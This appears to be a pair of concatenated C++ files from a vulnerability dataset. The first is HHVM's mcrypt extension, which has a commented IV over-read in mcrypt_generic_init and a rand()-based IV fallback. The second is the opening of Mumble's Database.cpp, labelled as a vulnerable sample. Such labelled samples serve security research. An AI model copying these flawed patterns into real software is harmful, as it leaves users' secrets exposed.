memset(iv_s, 0, iv_size + 1);
}
}
int block_size;
unsigned long int data_size;
String s;
char *data_s;
/* Check blocksize */
if (mcrypt_enc_is_block_mode(td) == 1) { /* It's a block algorithm */
block_size = mcrypt_enc_get_block_size(td);
data_size = (((data.size() - 1) / block_size) + 1) * block_size;
s = String(data_size, ReserveString);
data_s = (char*)s.bufferSlice().ptr;
memset(data_s, 0, data_size);
memcpy(data_s, data.data(), data.size());
} else { /* It's not a block algorithm */
data_size = data.size();
s = String(data_size, ReserveString);
data_s = (char*)s.bufferSlice().ptr;
memcpy(data_s, data.data(), data.size());
}
if (mcrypt_generic_init(td, key_s, use_key_length, iv_s) < 0) {
raise_warning("Mcrypt initialisation failed");
return false;
}
if (dencrypt) {
mdecrypt_generic(td, data_s, data_size);
} else {
mcrypt_generic(td, data_s, data_size);
}
/* freeing vars */
mcrypt_generic_end(td);
if (key_s != nullptr) {
free(key_s);
}
if (iv_s != nullptr) {
free(iv_s);
}
s.setSize(data_size);
return s;
}
static Variant mcrypt_generic(const Resource& td, const String& data,
bool dencrypt) {
MCrypt *pm = td.getTyped<MCrypt>();
if (!pm->m_init) {
raise_warning("Operation disallowed prior to mcrypt_generic_init().");
return false;
}
if (data.empty()) {
raise_warning("An empty string was passed");
return false;
}
String s;
unsigned char* data_s;
int block_size, data_size;
/* Check blocksize */
if (mcrypt_enc_is_block_mode(pm->m_td) == 1) { /* It's a block algorithm */
block_size = mcrypt_enc_get_block_size(pm->m_td);
data_size = (((data.size() - 1) / block_size) + 1) * block_size;
s = String(data_size, ReserveString);
data_s = (unsigned char *)s.bufferSlice().ptr;
memset(data_s, 0, data_size);
memcpy(data_s, data.data(), data.size());
} else { /* It's not a block algorithm */
data_size = data.size();
s = String(data_size, ReserveString);
data_s = (unsigned char *)s.bufferSlice().ptr;
memcpy(data_s, data.data(), data.size());
}
if (dencrypt) {
mdecrypt_generic(pm->m_td, data_s, data_size);
} else {
mcrypt_generic(pm->m_td, data_s, data_size);
}
s.setSize(data_size);
return s;
}
///////////////////////////////////////////////////////////////////////////////
Variant HHVM_FUNCTION(mcrypt_module_open, const String& algorithm,
const String& algorithm_directory,
const String& mode, const String& mode_directory) {
MCRYPT td = mcrypt_module_open
((char*)algorithm.data(),
(char*)(algorithm_directory.empty() ? MCG(algorithms_dir).data() :
algorithm_directory.data()),
(char*)mode.data(),
(char*)(mode_directory.empty() ? (char*)MCG(modes_dir).data() :
mode_directory.data()));
if (td == MCRYPT_FAILED) {
raise_warning("Could not open encryption module");
return false;
}
return Resource(new MCrypt(td));
}
bool HHVM_FUNCTION(mcrypt_module_close, const Resource& td) {
td.getTyped<MCrypt>()->close();
return true;
}
Array HHVM_FUNCTION(mcrypt_list_algorithms,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
int count = 0;
char **modules = mcrypt_list_algorithms((char*)dir.data(), &count);
if (count == 0) {
raise_warning("No algorithms found in module dir");
}
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(String(modules[i], CopyString));
}
mcrypt_free_p(modules, count);
return ret;
}
Array HHVM_FUNCTION(mcrypt_list_modes,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(modes_dir)) : lib_dir;
int count = 0;
char **modules = mcrypt_list_modes((char*)dir.data(), &count);
if (count == 0) {
raise_warning("No modes found in module dir");
}
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(String(modules[i], CopyString));
}
mcrypt_free_p(modules, count);
return ret;
}
int64_t HHVM_FUNCTION(mcrypt_module_get_algo_block_size,
const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_get_algo_block_size((char*)algorithm.data(),
(char*)dir.data());
}
int64_t HHVM_FUNCTION(mcrypt_module_get_algo_key_size, const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_get_algo_key_size((char*)algorithm.data(),
(char*)dir.data());
}
Array HHVM_FUNCTION(mcrypt_module_get_supported_key_sizes,
const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
int count = 0;
int *key_sizes = mcrypt_module_get_algo_supported_key_sizes
((char*)algorithm.data(), (char*)dir.data(), &count);
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(key_sizes[i]);
}
mcrypt_free(key_sizes);
return ret;
}
bool HHVM_FUNCTION(mcrypt_module_is_block_algorithm_mode, const String& mode,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(modes_dir)) : lib_dir;
return mcrypt_module_is_block_algorithm_mode((char*)mode.data(),
(char*)dir.data()) == 1;
}
bool HHVM_FUNCTION(mcrypt_module_is_block_algorithm, const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_is_block_algorithm((char*)algorithm.data(),
(char*)dir.data()) == 1;
}
bool HHVM_FUNCTION(mcrypt_module_is_block_mode, const String& mode,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(modes_dir)) : lib_dir;
return mcrypt_module_is_block_mode((char*)mode.data(),
(char*)dir.data()) == 1;
}
bool HHVM_FUNCTION(mcrypt_module_self_test, const String& algorithm,
const String& lib_dir /* = null_string */) {
String dir = lib_dir.empty() ? String(MCG(algorithms_dir)) : lib_dir;
return mcrypt_module_self_test((char*)algorithm.data(),
(char*)dir.data()) == 0;
}
Variant HHVM_FUNCTION(mcrypt_create_iv, int size, int source /* = 0 */) {
if (size <= 0 || size >= INT_MAX) {
raise_warning("Can not create an IV with a size of less than 1 or "
"greater than %d", INT_MAX);
return false;
}
int n = 0;
char *iv = (char*)calloc(size + 1, 1);
if (source == RANDOM || source == URANDOM) {
int fd = open(source == RANDOM ? "/dev/random" : "/dev/urandom", O_RDONLY);
if (fd < 0) {
free(iv);
raise_warning("Cannot open source device");
return false;
}
int read_bytes;
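// /dev/random and /dev/urandom may return short reads, so keep reading until the full IV is gathered or read() fails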
for (read_bytes = 0; read_bytes < size && n >= 0; read_bytes += n) {
n = read(fd, iv + read_bytes, size - read_bytes);
}
n = read_bytes;
close(fd);
if (n < size) {
free(iv);
raise_warning("Could not gather sufficient random data");
return false;
}
} else {
n = size;
while (size) {
// Use userspace rand() function because it handles auto-seeding
iv[--size] = (char)f_rand(0, 255);
}
}
return String(iv, n, AttachString);
}
Variant HHVM_FUNCTION(mcrypt_encrypt, const String& cipher, const String& key,
const String& data, const String& mode,
const Variant& viv /* = null_string */) {
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, mode, iv, false,
"mcrypt_encrypt");
}
Variant HHVM_FUNCTION(mcrypt_decrypt, const String& cipher, const String& key,
const String& data, const String& mode,
const Variant& viv /* = null_string */) {
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, mode, iv, true,
"mcrypt_decrypt");
}
Variant HHVM_FUNCTION(mcrypt_cbc, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_cbc() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "cbc", iv, mode.toInt32(),
"mcrypt_cbc");
}
Variant HHVM_FUNCTION(mcrypt_cfb, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_cfb() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "cfb", iv, mode.toInt32(),
"mcrypt_cfb");
}
Variant HHVM_FUNCTION(mcrypt_ecb, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_ecb() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "ecb", iv, mode.toInt32(),
"mcrypt_ecb");
}
Variant HHVM_FUNCTION(mcrypt_ofb, const String& cipher, const String& key,
const String& data, const Variant& mode,
const Variant& viv /* = null_string */) {
raise_deprecated("Function mcrypt_ofb() is deprecated");
String iv = viv.toString();
return php_mcrypt_do_crypt(cipher, key, data, "ofb", iv, mode.toInt32(),
"mcrypt_ofb");
}
Variant HHVM_FUNCTION(mcrypt_get_block_size, const String& cipher,
const Variant& module /* = null_string */) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)module.asCStrRef().data(),
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_block_size");
return false;
}
int64_t ret = mcrypt_enc_get_block_size(td);
mcrypt_module_close(td);
return ret;
}
Variant HHVM_FUNCTION(mcrypt_get_cipher_name, const String& cipher) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)"ecb",
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)"stream",
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_cipher_name");
return false;
}
}
char *cipher_name = mcrypt_enc_get_algorithms_name(td);
mcrypt_module_close(td);
String ret(cipher_name, CopyString);
mcrypt_free(cipher_name);
return ret;
}
Variant HHVM_FUNCTION(mcrypt_get_iv_size, const String& cipher,
const String& mode) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)mode.data(),
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_iv_size");
return false;
}
int64_t ret = mcrypt_enc_get_iv_size(td);
mcrypt_module_close(td);
return ret;
}
Variant HHVM_FUNCTION(mcrypt_get_key_size, const String& cipher,
const String& module) {
MCRYPT td = mcrypt_module_open((char*)cipher.data(),
(char*)MCG(algorithms_dir).data(),
(char*)module.data(),
(char*)MCG(modes_dir).data());
if (td == MCRYPT_FAILED) {
MCRYPT_OPEN_MODULE_FAILED("mcrypt_get_key_size");
return false;
}
int64_t ret = mcrypt_enc_get_key_size(td);
mcrypt_module_close(td);
return ret;
}
String HHVM_FUNCTION(mcrypt_enc_get_algorithms_name, const Resource& td) {
char *name = mcrypt_enc_get_algorithms_name(td.getTyped<MCrypt>()->m_td);
String ret(name, CopyString);
mcrypt_free(name);
return ret;
}
int64_t HHVM_FUNCTION(mcrypt_enc_get_block_size, const Resource& td) {
return mcrypt_enc_get_block_size(td.getTyped<MCrypt>()->m_td);
}
int64_t HHVM_FUNCTION(mcrypt_enc_get_iv_size, const Resource& td) {
return mcrypt_enc_get_iv_size(td.getTyped<MCrypt>()->m_td);
}
int64_t HHVM_FUNCTION(mcrypt_enc_get_key_size, const Resource& td) {
return mcrypt_enc_get_key_size(td.getTyped<MCrypt>()->m_td);
}
String HHVM_FUNCTION(mcrypt_enc_get_modes_name, const Resource& td) {
char *name = mcrypt_enc_get_modes_name(td.getTyped<MCrypt>()->m_td);
String ret(name, CopyString);
mcrypt_free(name);
return ret;
}
Array HHVM_FUNCTION(mcrypt_enc_get_supported_key_sizes, const Resource& td) {
int count = 0;
int *key_sizes =
mcrypt_enc_get_supported_key_sizes(td.getTyped<MCrypt>()->m_td, &count);
Array ret = Array::Create();
for (int i = 0; i < count; i++) {
ret.append(key_sizes[i]);
}
mcrypt_free(key_sizes);
return ret;
}
bool HHVM_FUNCTION(mcrypt_enc_is_block_algorithm_mode, const Resource& td) {
return mcrypt_enc_is_block_algorithm_mode(td.getTyped<MCrypt>()->m_td) == 1;
}
bool HHVM_FUNCTION(mcrypt_enc_is_block_algorithm, const Resource& td) {
return mcrypt_enc_is_block_algorithm(td.getTyped<MCrypt>()->m_td) == 1;
}
bool HHVM_FUNCTION(mcrypt_enc_is_block_mode, const Resource& td) {
return mcrypt_enc_is_block_mode(td.getTyped<MCrypt>()->m_td) == 1;
}
int64_t HHVM_FUNCTION(mcrypt_enc_self_test, const Resource& td) {
return mcrypt_enc_self_test(td.getTyped<MCrypt>()->m_td);
}
int64_t HHVM_FUNCTION(mcrypt_generic_init, const Resource& td,
const String& key,
const String& iv) {
MCrypt *pm = td.getTyped<MCrypt>();
int max_key_size = mcrypt_enc_get_key_size(pm->m_td);
int iv_size = mcrypt_enc_get_iv_size(pm->m_td);
if (key.empty()) {
raise_warning("Key size is 0");
}
unsigned char *key_s = (unsigned char *)malloc(key.size());
memset(key_s, 0, key.size());
unsigned char *iv_s = (unsigned char *)malloc(iv_size + 1);
memset(iv_s, 0, iv_size + 1);
int key_size;
if (key.size() > max_key_size) {
raise_warning("Key size too large; supplied length: %d, max: %d",
key.size(), max_key_size);
key_size = max_key_size;
} else {
key_size = key.size();
}
memcpy(key_s, key.data(), key.size());
if (iv.size() != iv_size) {
raise_warning("Iv size incorrect; supplied length: %d, needed: %d",
iv.size(), iv_size);
}
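  // Note: when the supplied IV is shorter than iv_size, only a warning is
  // raised above and the memcpy below still copies iv_size bytes, which can
  // read past the end of the supplied IV.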
memcpy(iv_s, iv.data(), iv_size);
mcrypt_generic_deinit(pm->m_td);
int result = mcrypt_generic_init(pm->m_td, key_s, key_size, iv_s);
/* If this function fails, close the mcrypt module to prevent crashes
* when further functions want to access this resource */
if (result < 0) {
pm->close();
switch (result) {
case -3:
raise_warning("Key length incorrect");
break;
case -4:
raise_warning("Memory allocation error");
break;
case -1:
default:
raise_warning("Unknown error");
break;
}
}
pm->m_init = true;
free(iv_s);
free(key_s);
return result;
}
Variant HHVM_FUNCTION(mcrypt_generic, const Resource& td, const String& data) {
return mcrypt_generic(td, data, false);
}
Variant HHVM_FUNCTION(mdecrypt_generic, const Resource& td,
const String& data) {
return mcrypt_generic(td, data, true);
}
bool HHVM_FUNCTION(mcrypt_generic_deinit, const Resource& td) {
MCrypt *pm = td.getTyped<MCrypt>();
if (mcrypt_generic_deinit(pm->m_td) < 0) {
raise_warning("Could not terminate encryption specifier");
return false;
}
pm->m_init = false;
return true;
}
bool HHVM_FUNCTION(mcrypt_generic_end, const Resource& td) {
return HHVM_FUNCTION(mcrypt_generic_deinit, td);
}
///////////////////////////////////////////////////////////////////////////////
const StaticString s_MCRYPT_3DES("MCRYPT_3DES");
const StaticString s_MCRYPT_ARCFOUR("MCRYPT_ARCFOUR");
const StaticString s_MCRYPT_ARCFOUR_IV("MCRYPT_ARCFOUR_IV");
const StaticString s_MCRYPT_BLOWFISH("MCRYPT_BLOWFISH");
const StaticString s_MCRYPT_BLOWFISH_COMPAT("MCRYPT_BLOWFISH_COMPAT");
const StaticString s_MCRYPT_CAST_128("MCRYPT_CAST_128");
const StaticString s_MCRYPT_CAST_256("MCRYPT_CAST_256");
const StaticString s_MCRYPT_CRYPT("MCRYPT_CRYPT");
const StaticString s_MCRYPT_DECRYPT("MCRYPT_DECRYPT");
const StaticString s_MCRYPT_DES("MCRYPT_DES");
const StaticString s_MCRYPT_DEV_RANDOM("MCRYPT_DEV_RANDOM");
const StaticString s_MCRYPT_DEV_URANDOM("MCRYPT_DEV_URANDOM");
const StaticString s_MCRYPT_ENCRYPT("MCRYPT_ENCRYPT");
const StaticString s_MCRYPT_ENIGNA("MCRYPT_ENIGNA");
const StaticString s_MCRYPT_GOST("MCRYPT_GOST");
const StaticString s_MCRYPT_IDEA("MCRYPT_IDEA");
const StaticString s_MCRYPT_LOKI97("MCRYPT_LOKI97");
const StaticString s_MCRYPT_MARS("MCRYPT_MARS");
const StaticString s_MCRYPT_MODE_CBC("MCRYPT_MODE_CBC");
const StaticString s_MCRYPT_MODE_CFB("MCRYPT_MODE_CFB");
const StaticString s_MCRYPT_MODE_ECB("MCRYPT_MODE_ECB");
const StaticString s_MCRYPT_MODE_NOFB("MCRYPT_MODE_NOFB");
const StaticString s_MCRYPT_MODE_OFB("MCRYPT_MODE_OFB");
const StaticString s_MCRYPT_MODE_STREAM("MCRYPT_MODE_STREAM");
const StaticString s_MCRYPT_PANAMA("MCRYPT_PANAMA");
const StaticString s_MCRYPT_RAND("MCRYPT_RAND");
const StaticString s_MCRYPT_RC2("MCRYPT_RC2");
const StaticString s_MCRYPT_RC6("MCRYPT_RC6");
const StaticString s_MCRYPT_RIJNDAEL_128("MCRYPT_RIJNDAEL_128");
const StaticString s_MCRYPT_RIJNDAEL_192("MCRYPT_RIJNDAEL_192");
const StaticString s_MCRYPT_RIJNDAEL_256("MCRYPT_RIJNDAEL_256");
const StaticString s_MCRYPT_SAFER128("MCRYPT_SAFER128");
const StaticString s_MCRYPT_SAFER64("MCRYPT_SAFER64");
const StaticString s_MCRYPT_SAFERPLUS("MCRYPT_SAFERPLUS");
const StaticString s_MCRYPT_SERPENT("MCRYPT_SERPENT");
const StaticString s_MCRYPT_SKIPJACK("MCRYPT_SKIPJACK");
const StaticString s_MCRYPT_THREEWAY("MCRYPT_THREEWAY");
const StaticString s_MCRYPT_TRIPLEDES("MCRYPT_TRIPLEDES");
const StaticString s_MCRYPT_TWOFISH("MCRYPT_TWOFISH");
const StaticString s_MCRYPT_WAKE("MCRYPT_WAKE");
const StaticString s_MCRYPT_XTEA("MCRYPT_XTEA");
class McryptExtension : public Extension {
public:
McryptExtension() : Extension("mcrypt") {}
virtual void moduleInit() {
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_3DES.get(), StaticString("tripledes").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_ARCFOUR.get(), StaticString("arcfour").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_ARCFOUR_IV.get(), StaticString("arcfour-iv").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_BLOWFISH.get(), StaticString("blowfish").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_BLOWFISH_COMPAT.get(), StaticString("blowfish-compat").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_CAST_128.get(), StaticString("cast-128").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_CAST_256.get(), StaticString("cast-256").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_CRYPT.get(), StaticString("crypt").get()
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_DECRYPT.get(), 1
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_DES.get(), StaticString("des").get()
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_DEV_RANDOM.get(), RANDOM
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_DEV_URANDOM.get(), URANDOM
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_ENCRYPT.get(), 0
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_ENIGNA.get(), StaticString("crypt").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_GOST.get(), StaticString("gost").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_IDEA.get(), StaticString("idea").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_LOKI97.get(), StaticString("loki97").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MARS.get(), StaticString("mars").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_CBC.get(), StaticString("cbc").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_CFB.get(), StaticString("cfb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_ECB.get(), StaticString("ecb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_NOFB.get(), StaticString("nofb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_OFB.get(), StaticString("ofb").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_MODE_STREAM.get(), StaticString("stream").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_PANAMA.get(), StaticString("panama").get()
);
Native::registerConstant<KindOfInt64>(
s_MCRYPT_RAND.get(), RAND
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RC2.get(), StaticString("rc2").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RC6.get(), StaticString("rc6").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RIJNDAEL_128.get(), StaticString("rijndael-128").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RIJNDAEL_192.get(), StaticString("rijndael-192").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_RIJNDAEL_256.get(), StaticString("rijndael-256").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SAFER128.get(), StaticString("safer-sk128").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SAFER64.get(), StaticString("safer-sk64").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SAFERPLUS.get(), StaticString("saferplus").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SERPENT.get(), StaticString("serpent").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_SKIPJACK.get(), StaticString("skipjack").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_THREEWAY.get(), StaticString("threeway").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_TRIPLEDES.get(), StaticString("tripledes").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_TWOFISH.get(), StaticString("twofish").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_WAKE.get(), StaticString("wake").get()
);
Native::registerConstant<KindOfStaticString>(
s_MCRYPT_XTEA.get(), StaticString("xtea").get()
);
HHVM_FE(mcrypt_module_open);
HHVM_FE(mcrypt_module_close);
HHVM_FE(mcrypt_list_algorithms);
HHVM_FE(mcrypt_list_modes);
HHVM_FE(mcrypt_module_get_algo_block_size);
HHVM_FE(mcrypt_module_get_algo_key_size);
HHVM_FE(mcrypt_module_get_supported_key_sizes);
HHVM_FE(mcrypt_module_is_block_algorithm_mode);
HHVM_FE(mcrypt_module_is_block_algorithm);
HHVM_FE(mcrypt_module_is_block_mode);
HHVM_FE(mcrypt_module_self_test);
HHVM_FE(mcrypt_create_iv);
HHVM_FE(mcrypt_encrypt);
HHVM_FE(mcrypt_decrypt);
HHVM_FE(mcrypt_cbc);
HHVM_FE(mcrypt_cfb);
HHVM_FE(mcrypt_ecb);
HHVM_FE(mcrypt_ofb);
HHVM_FE(mcrypt_get_block_size);
HHVM_FE(mcrypt_get_cipher_name);
HHVM_FE(mcrypt_get_iv_size);
HHVM_FE(mcrypt_get_key_size);
HHVM_FE(mcrypt_enc_get_algorithms_name);
HHVM_FE(mcrypt_enc_get_block_size);
HHVM_FE(mcrypt_enc_get_iv_size);
HHVM_FE(mcrypt_enc_get_key_size);
HHVM_FE(mcrypt_enc_get_modes_name);
HHVM_FE(mcrypt_enc_get_supported_key_sizes);
HHVM_FE(mcrypt_enc_is_block_algorithm_mode);
HHVM_FE(mcrypt_enc_is_block_algorithm);
HHVM_FE(mcrypt_enc_is_block_mode);
HHVM_FE(mcrypt_enc_self_test);
HHVM_FE(mcrypt_generic_init);
HHVM_FE(mcrypt_generic);
HHVM_FE(mdecrypt_generic);
HHVM_FE(mcrypt_generic_deinit);
HHVM_FE(mcrypt_generic_end);
loadSystemlib();
}
} s_mcrypt_extension;
///////////////////////////////////////////////////////////////////////////////
}
| ./CrossVul/dataset_final_sorted/CWE-310/cpp/good_2259_0 |
crossvul-cpp_data_bad_3579_0 | /* Copyright (C) 2005-2011, Thorvald Natvig <thorvald@natvig.com>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
- Neither the name of the Mumble Developers nor the names of its
contributors may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "Database.h"
#include "Global.h"
#include "Message.h"
#include "Net.h"
#include "Version.h"
Database::Database() {
QSqlDatabase db = QSqlDatabase::addDatabase(QLatin1String("QSQLITE"));
QSettings qs;
QStringList datapaths;
int i;
datapaths << g.qdBasePath.absolutePath();
datapaths << QDesktopServices::storageLocation(QDesktopServices::DataLocation);
#if defined(Q_OS_UNIX) && ! defined(Q_OS_MAC)
datapaths << QDir::homePath() + QLatin1String("/.config/Mumble");
#endif
datapaths << QDir::homePath();
datapaths << QDir::currentPath();
datapaths << qApp->applicationDirPath();
datapaths << qs.value(QLatin1String("InstPath")).toString();
bool found = false;
for (i = 0; (i < datapaths.size()) && ! found; i++) {
if (!datapaths[i].isEmpty()) {
QFile f(datapaths[i] + QLatin1String("/mumble.sqlite"));
if (f.exists()) {
db.setDatabaseName(f.fileName());
found = db.open();
}
QFile f2(datapaths[i] + QLatin1String("/.mumble.sqlite"));
if (f2.exists()) {
db.setDatabaseName(f2.fileName());
found = db.open();
}
}
}
if (! found) {
for (i = 0; (i < datapaths.size()) && ! found; i++) {
if (!datapaths[i].isEmpty()) {
QDir::root().mkpath(datapaths[i]);
#ifdef Q_OS_WIN
QFile f(datapaths[i] + QLatin1String("/mumble.sqlite"));
#else
QFile f(datapaths[i] + QLatin1String("/.mumble.sqlite"));
#endif
db.setDatabaseName(f.fileName());
found = db.open();
}
}
}
if (! found) {
QMessageBox::critical(NULL, QLatin1String("Mumble"), tr("Mumble failed to initialize a database in any\nof the possible locations."), QMessageBox::Ok | QMessageBox::Default, QMessageBox::NoButton);
qFatal("Database: Failed initialization");
}
QFileInfo fi(db.databaseName());
if (! fi.isWritable()) {
QMessageBox::critical(NULL, QLatin1String("Mumble"), tr("The database '%1' is read-only. Mumble cannot store server settings (i.e. SSL certificates) until you fix this problem.").arg(fi.filePath()), QMessageBox::Ok | QMessageBox::Default, QMessageBox::NoButton);
qWarning("Database: Database is read-only");
}
QSqlQuery query;
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `servers` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `name` TEXT, `hostname` TEXT, `port` INTEGER DEFAULT " MUMTEXT(DEFAULT_MUMBLE_PORT) ", `username` TEXT, `password` TEXT)"));
query.exec(QLatin1String("ALTER TABLE `servers` ADD COLUMN `url` TEXT"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `comments` (`who` TEXT, `comment` BLOB, `seen` DATE)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `comments_comment` ON `comments`(`who`, `comment`)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `comments_seen` ON `comments`(`seen`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `blobs` (`hash` TEXT, `data` BLOB, `seen` DATE)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `blobs_hash` ON `blobs`(`hash`)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `blobs_seen` ON `blobs`(`seen`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `tokens` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `digest` BLOB, `token` TEXT)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `tokens_host_port` ON `tokens`(`digest`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `shortcut` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `digest` BLOB, `shortcut` BLOB, `target` BLOB, `suppress` INTEGER)"));
query.exec(QLatin1String("CREATE INDEX IF NOT EXISTS `shortcut_host_port` ON `shortcut`(`digest`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `udp` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `digest` BLOB)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `udp_host_port` ON `udp`(`digest`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `cert` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `hostname` TEXT, `port` INTEGER, `digest` TEXT)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `cert_host_port` ON `cert`(`hostname`,`port`)"));
query.exec(QLatin1String("CREATE TABLE IF NOT EXISTS `friends` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `name` TEXT, `hash` TEXT)"));
query.exec(QLatin1String("CREATE UNIQUE INDEX IF NOT EXISTS `friends_name` ON `friends`(`name`)"));
